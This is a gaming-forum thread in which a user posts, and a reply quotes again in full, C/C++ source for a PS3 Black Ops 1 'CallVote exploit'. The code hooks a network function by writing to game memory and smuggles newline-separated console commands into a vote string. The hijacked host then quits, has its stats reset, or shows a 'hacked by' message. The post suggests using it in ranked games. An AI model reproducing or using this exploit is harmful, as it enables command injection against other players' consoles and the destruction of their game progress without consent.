Post: Bo1 Non-Host Infection A.K.A. CallVote Exploit
Options
09-26-2018, 03:19 PM
#1
-JM-
Space Ninja
/*Bo1 Nonhost Infection A.K.A. CallVote Exploit
Credits:
https://old.zenhax.com/quake3-engine-callvote-bug-t686.html
Luigi for documenting Quake 3 callvote Exploite
01cedricv2 for showing Quake documentation to Jo-Milk
and Jo-Milk for porting to PS3
This can be ported on Bo2 [Tested] and Other cods
This infects the host once Vote passes to do so
you need to join your friend in a private match
He'll need to be the host:
1st way is:
you tell him to go spectator and you spawn in and use cbuf_AddText
2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
*/
#define TOC 0x0072DCE8//1.13
int var = 1;//change this value to change the infection type
int cbuf[] = { 0x00399CC8, TOC };
void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;
void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
}
void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
{
if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
{
switch (var)
{
case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
}
}
else
{
MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
}
}
/*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/
/*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");
/*--------------------------------------------------Extra----------------------------------------------------------------------*/
//read write syscalls
int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
{
system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}
template<typename T>
int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
{
return sys_dbg_read_process_memory(address, &data, size);
}
int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
{
system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}
template<typename T>
int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
{
return sys_dbg_write_process_memory(address, &value, size);
}
void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
{
uint32_t normalFunctionStub[8], hookFunctionStub[4];
sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
normalFunctionStub[6] = 0x7D6903A6;
normalFunctionStub[7] = 0x4E800420;
sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
hookFunctionStub[2] = 0x7D6903A6;
hookFunctionStub[3] = 0x4E800420
sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
}
HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);
You must login or register to view this content.
PLEASE keep the credits how it is
The following 2 users say thank you to -JM- for this useful post:
09-28-2018, 10:37 AM
#3
S63
Space Ninja
Originally posted by JM
If all clients stats ain't released here's the alternative =D
You must login or register to view this content.
PLEASE keep the credits how it is
/*Bo1 Nonhost Infection A.K.A. CallVote Exploit
Credits:
https://old.zenhax.com/quake3-engine-callvote-bug-t686.html
Luigi for documenting Quake 3 callvote Exploite
01cedricv2 for showing Quake documentation to Jo-Milk
and Jo-Milk for porting to PS3
This can be ported on Bo2 [Tested] and Other cods
This infects the host once Vote passes to do so
you need to join your friend in a private match
He'll need to be the host:
1st way is:
you tell him to go spectator and you spawn in and use cbuf_AddText
2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
*/
#define TOC 0x0072DCE8//1.13
int var = 1;//change this value to change the infection type
int cbuf[] = { 0x00399CC8, TOC };
void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;
void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
}
void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
{
if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
{
switch (var)
{
case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
}
}
else
{
MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
}
}
/*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/
/*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");
/*--------------------------------------------------Extra----------------------------------------------------------------------*/
//read write syscalls
int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
{
system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}
template<typename T>
int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
{
return sys_dbg_read_process_memory(address, &data, size);
}
int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
{
system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}
template<typename T>
int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
{
return sys_dbg_write_process_memory(address, &value, size);
}
void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
{
uint32_t normalFunctionStub[8], hookFunctionStub[4];
sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
normalFunctionStub[6] = 0x7D6903A6;
normalFunctionStub[7] = 0x4E800420;
sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
hookFunctionStub[2] = 0x7D6903A6;
hookFunctionStub[3] = 0x4E800420
sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
}
HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);
You must login or register to view this content.
PLEASE keep the credits how it is
Reported haxor nub. Jokes good work bish
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
